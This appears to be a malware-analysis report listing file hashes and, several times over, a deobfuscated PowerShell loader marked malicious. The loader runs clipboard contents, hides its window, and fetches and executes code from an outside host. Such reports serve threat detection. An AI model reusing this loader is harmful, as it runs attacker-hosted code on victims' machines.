|
Hash | Hash Value |
|---|---|
| MD5 | 3c74d21543d6ff780df842652d890f72
|
| Sha1 | deec7596b98971d022168e9d6c753c63b6f35c4c
|
| Sha256 | f58056af2ee8a026f77617845746947929b52140b4c7240bdfb985fcef6b6279
|
| Sha384 | 8f61c654ccc2c668135631b1d1a0734114bba69a2044ec0c740bd4d1567dab9385b37d6d63684261ab40d64136d1e53c
|
| Sha512 | 1306312d6235919c8b0d484d5bd2264509729dd03015d9b5af4dce437129d9aeaf58a4a226af8d5da4e636c272d98c4aeeafe2a06136e2d1dfb00ff11a009d49
|
| SSDeep | 12:s8U0lu/LCUcQ9Oqa3tgB1O+PPzazLgyaIS1PKC2Gs8BxS55ksz8vJpp6aFCIq29:ELCUnLa34hPP+zLw1PKC2Gxo+DpBTt
|
| TLSH | F011F418375F7DE409D484778E8928EF961101AC1D6415D837CDC2516F6B1CF167B30C
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu |
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu |
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu Malicious |
3c74d21543d6ff780df842652d890f72 |
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu Malicious |
3c74d21543d6ff780df842652d890f72 > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu Malicious |
3c74d21543d6ff780df842652d890f72 > [Deobfuscated PS] > [Deobfuscated PS] |